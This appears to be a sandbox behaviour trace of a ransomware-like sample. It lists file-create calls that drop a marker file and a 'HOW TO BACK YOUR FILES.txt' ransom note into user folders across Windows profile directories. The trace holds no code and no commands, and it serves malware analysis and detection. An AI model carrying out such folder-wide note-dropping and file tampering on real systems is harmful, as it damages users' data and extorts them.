Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\eL us.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\ESkoG93QSJ_.rtf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\Pz05d0eMPE9uLbau\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\Pz05d0eMPE9uLbau\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\Pz05d0eMPE9uLbau\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\Pru_HSlVaZZy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\Pru_HSlVaZZy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\Pru_HSlVaZZy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\PKipV99o wn\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\PKipV99o wn\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\PKipV99o wn\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\L1V20aHJ_D\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\L1V20aHJ_D\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Documents\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Documents\My Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\Documents\My Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Documents\My Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Documents\My Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\Documents\My Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Documents\My Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Documents\My Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\Documents\My Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Documents\My Music\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Desktop\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\Desktop\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Desktop\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\AccountPictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\AccountPictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\AccountPictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\ntuser.dat.LOG1 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\ntuser.dat.LOG2 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\L1V20aHJ_D\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\k-4gMU az_fjNHgxABE6\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\k-4gMU az_fjNHgxABE6\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\k-4gMU az_fjNHgxABE6\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\HpsLEgt47dc\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\HpsLEgt47dc\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\HpsLEgt47dc\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\9mWokFqz\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\9mWokFqz\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Music\SB9yfamy\9mWokFqz\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Templates\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Templates\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Templates\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Start Menu\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Start Menu\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Start Menu\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
